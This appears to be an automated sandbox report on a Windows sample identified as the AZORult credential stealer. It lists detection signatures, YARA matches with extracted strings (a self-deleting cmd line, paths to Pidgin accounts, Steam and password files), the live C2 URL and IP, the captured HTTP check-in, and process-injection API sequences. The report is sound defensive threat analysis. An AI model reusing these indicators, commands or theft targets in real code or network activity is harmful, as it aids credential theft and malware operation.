Edit tour

Windows Analysis Report
UoktqWamLR.exe

Overview

General Information

Sample name:	UoktqWamLR.exe renamed because original name is a hash value
Original sample name:	97CC0E7D7CAA3483E4C5E5CFF9FBE67E.exe
Analysis ID:	1504708
MD5:	97cc0e7d7caa3483e4c5e5cff9fbe67e
SHA1:	e74e03ad3d8f52ce5858a5e8208343fa04a2b367
SHA256:	65e1b5713b271302e96bab80440f744c13c953749562603ea3ee03eda880f9ea
Tags:	AZORultexe
Infos:

Detection

AZORult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected AZORult Info Stealer

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Azorult

Yara detected Azorult Info Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

UoktqWamLR.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\UoktqWamLR.exe" MD5: 97CC0E7D7CAA3483E4C5E5CFF9FBE67E)

UoktqWamLR.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\UoktqWamLR.exe" MD5: 97CC0E7D7CAA3483E4C5E5CFF9FBE67E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "https://ehzwq.shop/erd/mac/index.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xe164:$a2: %APPDATA%\.purple\accounts.xml 0xe8ac:$a3: %TEMP%\curbuf.dat 0x199b0:$a4: PasswordsList.txt 0x14d28:$a5: Software\Valve\Steam
00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xe164:$a2: %APPDATA%\.purple\accounts.xml 0xe8ac:$a3: %TEMP%\curbuf.dat 0x199b0:$a4: PasswordsList.txt 0x14d28:$a5: Software\Valve\Steam
00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x18728:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xc8bc:$a2: %APPDATA%\.purple\accounts.xml 0xd004:$a3: %TEMP%\curbuf.dat 0x18108:$a4: PasswordsList.txt 0x13480:$a5: Software\Valve\Steam
00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19728:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd8bc:$a2: %APPDATA%\.purple\accounts.xml 0xe004:$a3: %TEMP%\curbuf.dat 0x19108:$a4: PasswordsList.txt 0x14480:$a5: Software\Valve\Steam
00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x29728:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x1d8bc:$a2: %APPDATA%\.purple\accounts.xml 0x1e004:$a3: %TEMP%\curbuf.dat 0x29108:$a4: PasswordsList.txt 0x24480:$a5: Software\Valve\Steam
00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1893c:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcad0:$a2: %APPDATA%\.purple\accounts.xml 0xd218:$a3: %TEMP%\curbuf.dat 0x1831c:$a4: PasswordsList.txt 0x13694:$a5: Software\Valve\Steam
00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x2c72c:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x208c0:$a2: %APPDATA%\.purple\accounts.xml 0x21008:$a3: %TEMP%\curbuf.dat 0x2c10c:$a4: PasswordsList.txt 0x27484:$a5: Software\Valve\Steam
00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19728:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd8bc:$a2: %APPDATA%\.purple\accounts.xml 0xe004:$a3: %TEMP%\curbuf.dat 0x19108:$a4: PasswordsList.txt 0x14480:$a5: Software\Valve\Steam
Process Memory Space: UoktqWamLR.exe PID: 4952	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: UoktqWamLR.exe PID: 4952	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: UoktqWamLR.exe PID: 6164	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: UoktqWamLR.exe PID: 6164	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.UoktqWamLR.exe.4a70000.1.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.UoktqWamLR.exe.4a70000.1.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.UoktqWamLR.exe.4a70000.1.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x193d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd564:$a2: %APPDATA%\.purple\accounts.xml 0xdcac:$a3: %TEMP%\curbuf.dat 0x18db0:$a4: PasswordsList.txt 0x14128:$a5: Software\Valve\Steam
0.2.UoktqWamLR.exe.4a70000.1.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
2.2.UoktqWamLR.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
2.2.UoktqWamLR.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
2.2.UoktqWamLR.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x193d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd564:$a2: %APPDATA%\.purple\accounts.xml 0xdcac:$a3: %TEMP%\curbuf.dat 0x18db0:$a4: PasswordsList.txt 0x14128:$a5: Software\Valve\Steam
2.2.UoktqWamLR.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
2.2.UoktqWamLR.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
2.2.UoktqWamLR.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
2.2.UoktqWamLR.exe.400000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xe164:$a2: %APPDATA%\.purple\accounts.xml 0xe8ac:$a3: %TEMP%\curbuf.dat 0x199b0:$a4: PasswordsList.txt 0x14d28:$a5: Software\Valve\Steam
2.2.UoktqWamLR.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.UoktqWamLR.exe.4a70000.1.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.UoktqWamLR.exe.4a70000.1.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.UoktqWamLR.exe.4a70000.1.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xe164:$a2: %APPDATA%\.purple\accounts.xml 0xe8ac:$a3: %TEMP%\curbuf.dat 0x199b0:$a4: PasswordsList.txt 0x14d28:$a5: Software\Valve\Steam
0.2.UoktqWamLR.exe.4a70000.1.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 11 entries

Suricata Signatures

ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T10:21:53.608256+0200	2016858	1	A Network Trojan was detected	192.168.2.5	49707	45.77.249.79	443	TCP

ET MALWARE Win32/AZORult V3.2 Client Checkin M15

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T10:22:13.752816+0200	2029465	1	Malware Command and Control Activity Detected	192.168.2.5	49704	45.77.249.79	443	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T10:22:13.752816+0200	2810276	1	Malware Command and Control Activity Detected	192.168.2.5	49704	45.77.249.79	443	TCP

ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T10:22:12.936290+0200	2822521	1	Domain Observed Used for C2 Detected	45.77.249.79	443	192.168.2.5	49704	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://ehzwq.shop/erd/mac/index.phpa	Avira URL Cloud: Label: malware
Source: https://ehzwq.shop/	Avira URL Cloud: Label: malware
Source: https://ehzwq.shop/erd/mac/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "https://ehzwq.shop/erd/mac/index.php"}

Multi AV Scanner detection for submitted file

Source: UoktqWamLR.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: UoktqWamLR.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 2_2_0040A610 CryptUnprotectData,LocalFree,

2_2_0040A610

Source: UoktqWamLR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	2_2_00413030
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	2_2_0041160C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	2_2_00413F58
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	2_2_004119A8
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	2_2_004119AC
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	2_2_00412D6C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	2_2_00413F58

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.5:49707 -> 45.77.249.79:443
Source: Network traffic	Suricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.5:49704 -> 45.77.249.79:443
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.5:49704 -> 45.77.249.79:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://ehzwq.shop/erd/mac/index.php

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /erd/mac/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ehzwq.shopContent-Length: 101Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /erd/mac/index.php HTTP/1.0Host: ehzwq.shopConnection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 101Data Raw: 4a 4c ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 39 2f ef bf bd 39 4f ef bf bd 3f 4e ef bf bd 3e 3c ef bf bd 3e 33 ef bf bd 3e 3e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3e 33 ef bf bd 3e 3a ef bf bd 3e 3d ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4b 2f ef bf bd 3d 4c ef bf bd 3f 4e ef bf bd 4b 4b ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 3a 2f ef bf bd 49 2f ef bf bd 3f 4f ef bf bd 3e 33 ef bf bd 3e 38 ef bf bd 28 39 ef bf bd 49 2f ef bf bd 39 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ehzwq.shop

Source: unknown

HTTP traffic detected: POST /erd/mac/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ehzwq.shopContent-Length: 101Cache-Control: no-cache

Source: UoktqWamLR.exe, 00000000.00000003.2146906626.0000000000752000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/j
Source: UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://dotbit.me/a/
Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehzwq.shop/
Source: UoktqWamLR.exe, 00000002.00000003.2190958012.00000000023D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ehzwq.shop/erd/mac/index.php
Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehzwq.shop/erd/mac/index.phpa

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A7213 NtAllocateVirtualMemory,NtProtectVirtualMemory,ChrCmpIA,NtProtectVirtualMemory,	0_2_004A7213
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A73E0 NtQueryInformationProcess,	0_2_004A73E0
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02353113 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,	0_2_02353113
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023530DA NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,	0_2_023530DA

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 0_2_00751000

0_2_00751000

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: String function: 004034E4 appears 33 times

Source: UoktqWamLR.exe, 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe
Source: UoktqWamLR.exe, 00000002.00000000.2138058227.0000000000508000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe
Source: UoktqWamLR.exe	Binary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe

Source: UoktqWamLR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
